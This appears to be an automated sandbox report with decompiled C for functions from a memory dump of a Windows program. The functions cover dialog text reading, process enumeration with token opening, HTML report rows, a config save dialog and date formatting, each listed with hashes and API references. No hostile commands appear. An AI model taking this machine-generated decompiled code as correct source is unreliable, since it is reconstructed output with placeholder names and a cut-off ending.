API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}

0x00406157
0x0040616d
0x00406174
0x0040617f
0x00406185
0x00406196
0x0040619e
0x004061b6
0x004061bd
0x004061d4
0x004061da
0x004061e0
0x004061e5
0x004061e6
0x004061ef
0x004061f9
0x004061ff
0x004061ef
0x00406206

APIs

memset.MSVCRT ref: 00406174
GetDlgCtrlID.USER32 ref: 0040617F
GetWindowTextW.USER32 ref: 00406196
memset.MSVCRT ref: 004061BD
GetClassNameW.USER32 ref: 004061D4
_wcsicmp.MSVCRT ref: 004061E6

Part of subcall function 00406025: memset.MSVCRT ref: 00406038
Part of subcall function 00406025: _itow.MSVCRT ref: 00406046

Strings

sysdatetimepick32, xrefs: 004061E0

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
librarywindowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}

0x00404706
0x00404714
0x0040471c
0x00404721
0x0040472b
0x00404733
0x00404735
0x00404735
0x00404733
0x00404751
0x00404780
0x00404753
0x0040475e
0x00404766
0x0040476c
0x00404770
0x00404770
0x0040478a

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
wcslen.MSVCRT ref: 00404756
wcscpy.MSVCRT ref: 00404766
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
wcscpy.MSVCRT ref: 00404780

Strings

netmsg.dll, xrefs: 00404726

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}

0x0040598b
0x0040598b
0x0040599a
0x004059ae
0x004059b5
0x004059c1
0x004059c6
0x004059cb
0x004059ce
0x00405a7b
0x00405a7b
0x004059d4
0x004059d4
0x004059dc
0x004059ee
0x00000000
0x004059f0
0x004059f0
0x004059f6
0x004059f7
0x004059fa
0x00405a03
0x00405a2b
0x00405a2e
0x00405a3c
0x00405a40
0x00000000
0x00405a42
0x00405a42
0x00405a54
0x00405a59
0x00405a5a
0x00405a5a
0x00405a61
0x00405a69
0x00405a7f
0x00000000
0x00000000
0x00000000
0x00405a69
0x00405a05
0x00405a0e
0x00405a17
0x00000000
0x00405a19
0x00405a19
0x00405a1c
0x00405a1d
0x00405a20
0x00405a29
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a29
0x00405a17
0x00405a03
0x00000000
0x00405a6b
0x00405a6e
0x00405a72
0x00405a72
0x00000000
0x004059d4
0x00405a81
0x00405a84
0x00405a8f

APIs

memset.MSVCRT ref: 004059B5

Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

_wcsicmp.MSVCRT ref: 004059FA
wcschr.MSVCRT ref: 00405A0E
_wcsicmp.MSVCRT ref: 00405A20
OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
CloseHandle.KERNEL32(?), ref: 00405A5A
CloseHandle.KERNEL32(00000000), ref: 00405A61

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
String ID:
API String ID: 768606695-0
Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98

Uniqueness

Uniqueness Score: -1.00%

Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}

0x00407639
0x00407646
0x00407647
0x00407654
0x0040765f
0x0040765f
0x0040766b
0x0040766d
0x00407672
0x00407677
0x0040767d
0x00407680
0x00407686
0x00407691
0x00407697
0x00407699
0x00407699
0x0040769c
0x0040769f
0x004076a3
0x004076a7
0x004076ab
0x004076b5
0x004076be
0x004076c8
0x004076de
0x004076ee
0x004076f1
0x004076f4
0x004076fa
0x00407708
0x0040770e
0x00407718
0x0040771d
0x00407723
0x00407724
0x00407727
0x0040772c
0x0040772f
0x00407734
0x0040773f
0x00407744
0x00407745
0x0040767d
0x00407760

APIs

wcscat.MSVCRT ref: 00407708
_snwprintf.MSVCRT ref: 0040772F

Strings

<td bgcolor=#%s>%s, xrefs: 00407657
<tr>, xrefs: 00407661
 , xrefs: 00407702
<td bgcolor=#%s nowrap>%s, xrefs: 00407649

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

0x0040605e
0x00406061
0x00406069
0x00406074
0x0040607a
0x0040607e
0x00406082
0x00406148
0x0040614e
0x00000000
0x00000000
0x00000000
0x00406088
0x00406088
0x00406093
0x00406098
0x0040609f
0x004060ae
0x004060b6
0x004060be
0x004060c6
0x004060ca
0x004060cf
0x004060d7
0x00000000
0x00000000
0x004060de
0x00406129
0x00406129
0x0040612d
0x0040612f
0x00406130
0x00406134
0x00406137
0x0040613c
0x0040613c
0x00000000
0x0040612d
0x004060e7
0x004060f0
0x004060f2
0x004060f2
0x004060f9
0x004060fd
0x00406102
0x0040610c
0x00406112
0x00406117
0x00406117
0x00406104
0x00406104
0x00406104
0x00406104
0x00406102
0x00406122
0x00406128
0x00000000
0x0040613f
0x0040613f
0x00406140
0x00000000

APIs

GetMenuItemCount.USER32 ref: 00406074
memset.MSVCRT ref: 00406093
GetMenuItemInfoW.USER32 ref: 004060CF
wcschr.MSVCRT ref: 004060E7

Strings

0, xrefs: 004060AE
6, xrefs: 004060B6

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}

0x00402bee
0x00402bf8
0x00402cae
0x00402c08
0x00402c10
0x00402c11
0x00402c12
0x00402c13
0x00402c20
0x00402c27
0x00402c2e
0x00402c30
0x00402c37
0x00402c4b
0x00402c50
0x00402c53
0x00402c55
0x00402c3e
0x00402c3e
0x00402c41
0x00402c41
0x00402c5a
0x00402c60
0x00402c65
0x00402c68
0x00402c6d
0x00402c77
0x00402c7c
0x00402c7e
0x00402c87
0x00402ca5
0x00402ca5
0x00402c87
0x00402c7c
0x00402c6d
0x00000000
0x00402cac

APIs

GetSystemMetrics.USER32 ref: 00402C1C
GetSystemMetrics.USER32 ref: 00402C23
GetSystemMetrics.USER32 ref: 00402C2A
GetSystemMetrics.USER32 ref: 00402C30
GetSystemMetrics.USER32 ref: 00402C47
GetSystemMetrics.USER32 ref: 00402C4E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}

0x004036ef
0x004036f6
0x0040370b
0x00403712
0x00403717
0x0040371c
0x0040371f
0x0040372c
0x00403735
0x00403738
0x00403744
0x00403751
0x00403758
0x00403760
0x00403769
0x0040376c
0x00403778
0x0040377b
0x0040378b
0x00403792
0x00403795
0x00403798
0x0040379b
0x004037a2
0x004037a5
0x004037a8
0x004037af
0x004037b7
0x004037c3
0x00000000
0x004037d4
0x004037dc

APIs

memset.MSVCRT ref: 004036F6
memset.MSVCRT ref: 00403712

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Part of subcall function 00405236: memset.MSVCRT ref: 00405257
Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA

GetSaveFileNameW.COMDLG32(?), ref: 004037AF
wcscpy.MSVCRT ref: 004037C3

Strings

cfg, xrefs: 00403717
L, xrefs: 0040378B

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
String ID: L$cfg
API String ID: 275899518-3734058911
Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}

0x00404ed0
0x00404edf
0x00404ef6
0x00000000
0x00404f00
0x00404f1c
0x00404f31
0x00404f41
0x00404f4e
0x00404f5d
0x00404f66
0x00404f69
0x00404f69
0x00404f71
0x00404f77
0x00404f7d

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
wcscpy.MSVCRT ref: 00404F41
wcscat.MSVCRT ref: 00404F4E
wcscat.MSVCRT ref: 00404F5D
wcscpy.MSVCRT ref: 00404F71

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
